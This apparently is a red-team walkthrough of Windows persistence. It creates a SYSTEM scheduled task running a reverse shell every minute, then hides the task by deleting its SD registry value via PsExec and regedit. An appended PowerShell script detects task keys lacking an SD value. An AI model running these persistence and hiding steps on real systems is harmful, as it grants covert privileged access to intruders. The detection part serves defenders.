Scheduled Tasks (Elevated)
Let's create a task that runs a reverse shell every single minute. In a real-world scenario, you wouldn't want your payload to run so often:
C:\>schtasks /create /sc minute /mo 1 /tn Persistence /tr "C:\Windows\Tasks\shell.exe" /ru SYSTEM
SUCCESS: The scheduled task "Persistence" has successfully been created.
Where (run schtasks /create /? for usage):
/SC - specifies the schedule frequency. Valid schedule types: MINUTE, HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.
/MO 1 - schedule modifier; with /SC MINUTE, the task runs every single minute
/RU - the user account the task runs as
Verify that the task was created:
C:\>schtasks /query /tn Persistence
Folder: \
TaskName                                 Next Run Time          Status
======================================== ====================== ===============
Persistence                              4/3/2024 9:41:00 PM    Ready
We will get a shell after 1 minute.

To hide our task, let's delete the SD value for the "Persistence" task we created before. The security descriptors of all scheduled tasks are stored in
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree

We will use PsExec to open Regedit with SYSTEM privileges and delete the SD value:
C:\> PsExec64.exe -i -s regedit

C:\>schtasks /query /tn Persistence
ERROR: The system cannot find the file specified.
However, the task still executes as before.
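
Because a task in this state no longer shows up in schtasks /query, a defender has to look in the registry instead. The following is an added example, not part of the original page: it walks the TaskCache\Tree key named above and reports every task key that has no SD value. The function name Find-TaskWithoutSD is hypothetical, and the script assumes that task keys carry an Id value while folder keys do not.

```powershell
# Added detection example (not from the original page).
# Run from an elevated PowerShell prompt so the TaskCache keys are readable.
$TreePath = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'

function Find-TaskWithoutSD {
    # Hypothetical helper name. Returns one object per task key that lacks an SD value.
    param([string]$Root = $TreePath)

    $rootKey = Get-Item -LiteralPath $Root -ErrorAction Stop

    Get-ChildItem -LiteralPath $Root -Recurse -ErrorAction SilentlyContinue |
        ForEach-Object {
            $names = $_.GetValueNames()

            # Assumption: task keys carry an 'Id' value, folder keys do not.
            # A task key with 'Id' but no 'SD' is the state produced by
            # deleting the security descriptor.
            if (($names -contains 'Id') -and ($names -notcontains 'SD')) {
                [pscustomobject]@{
                    # Task path relative to Tree, e.g. \Persistence
                    TaskPath = $_.Name.Substring($rootKey.Name.Length)
                    Id       = $_.GetValue('Id')
                    KeyPath  = $_.Name
                }
            }
        }
}

$hits = @(Find-TaskWithoutSD)

if ($hits.Count -eq 0) {
    Write-Output 'No task keys without an SD value were found.'
} else {
    Write-Output ("{0} task key(s) without an SD value:" -f $hits.Count)
    $hits | Format-List TaskPath, Id, KeyPath
}
```

On the host used in this walkthrough, the "Persistence" key would be reported, since its SD value was deleted while the rest of the key was left in place.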
